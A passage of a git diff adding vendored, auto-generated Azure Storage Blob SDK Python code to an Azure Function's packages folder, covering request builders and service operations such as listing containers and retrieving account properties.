may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "incrementalcopy") # type: str + + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_copy_incremental_request( + url=self._config.url, + comp=comp, + version=self._config.version, + copy_source=copy_source, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.copy_incremental.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + copy_incremental.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py new file mode 100644 index 0000000..f2b2050 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_service_operations.py @@ -0,0 +1,1105 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_set_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_statistics_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_containers_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_user_delegation_key_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_submit_batch_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['Content-Type'] = _SERIALIZER.header("multipart_content_type", multipart_content_type, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_filter_blobs_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "blobs") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + where = kwargs.pop('where', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if where is not None: + _query_parameters['where'] = _SERIALIZER.query("where", where, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class ServiceOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`service` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def set_properties( # pylint: disable=inconsistent-return-statements + self, + storage_service_properties, # type: "_models.StorageServiceProperties" + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Sets properties for a storage account's Blob service endpoint, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param storage_service_properties: The StorageService properties. + :type storage_service_properties: ~azure.storage.blob.models.StorageServiceProperties + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(storage_service_properties, 'StorageServiceProperties', is_xml=True) + + request = build_set_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_properties( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.StorageServiceProperties" + """gets the properties of a storage account's Blob service, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceProperties, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceProperties + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceProperties"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('StorageServiceProperties', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_statistics( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.StorageServiceStats" + """Retrieves statistics related to replication for the Blob service. It is only available on the + secondary location endpoint when read-access geo-redundant replication is enabled for the + storage account. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "stats". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceStats, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceStats + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceStats"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + + + request = build_get_statistics_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_statistics.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('StorageServiceStats', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_statistics.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def list_containers_segment( + self, + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListContainersSegmentResponse" + """The List Containers Segment operation returns a list of the containers under the specified + account. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify that the container's metadata be returned as + part of the response body. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListContainersIncludeType] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListContainersSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListContainersSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListContainersSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_containers_segment_request( + url=self._config.url, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_containers_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('ListContainersSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_containers_segment.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_user_delegation_key( + self, + key_info, # type: "_models.KeyInfo" + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.UserDelegationKey" + """Retrieves a user delegation key for the Blob service. This is only a valid operation when using + bearer token authentication. + + :param key_info: Key information. + :type key_info: ~azure.storage.blob.models.KeyInfo + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "userdelegationkey". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: UserDelegationKey, or the result of cls(response) + :rtype: ~azure.storage.blob.models.UserDelegationKey + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.UserDelegationKey"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(key_info, 'KeyInfo', is_xml=True) + + request = build_get_user_delegation_key_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_user_delegation_key.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('UserDelegationKey', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_user_delegation_key.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', 